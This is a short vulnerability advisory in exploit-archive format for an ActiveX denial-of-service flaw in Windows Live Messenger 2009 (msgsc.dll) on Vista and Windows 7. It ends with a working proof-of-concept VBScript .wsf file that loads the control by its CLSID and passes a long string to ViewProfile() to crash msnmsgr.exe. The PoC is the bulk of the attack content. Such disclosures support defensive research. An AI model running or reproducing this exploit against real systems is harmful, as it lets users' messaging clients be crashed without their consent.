10011.txt

Windows Live Messenger 2009 ActiveX DoS Vulnerability
=====================================================


Product:
Windows Live Messenger 2009 (Build 14.0.8089.726)
 
************************************************************************
********
Vulnerability:
ActiveX - Denial of Service
 
************************************************************************
********
Discussion:
Vulnerability is in Activex Control(msgsc.14.0.8089.726.dll)
Sending a string to ViewProfile() , cause a crash on msnmsgr.exe
*must be signed in Msn Messenger account for triggerin the vulnerability.
 
************************************************************************
********
Vulnerable:
Windows Live Messenger 2009 on Windows Vista
Windows Live Messenger 2009 on Windows 7
 
Not Vulnerable:
Windows Live Messenger 2009 on Windows XP
 
 
************************************************************************
********
PoC .wsf script:
'works on vista and windows7
 
<package>
 
<job id='DoneInVBS' debug='false' error='true'>
 
<object classid='clsid:B69003B3-C55E-4B48-836C-BC5946FC3B28' id='target' />
 
<script language='vbscript'>
 
arg1=("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA")
 
target.ViewProfile arg1
 
</script>
 
</job>
 
</package>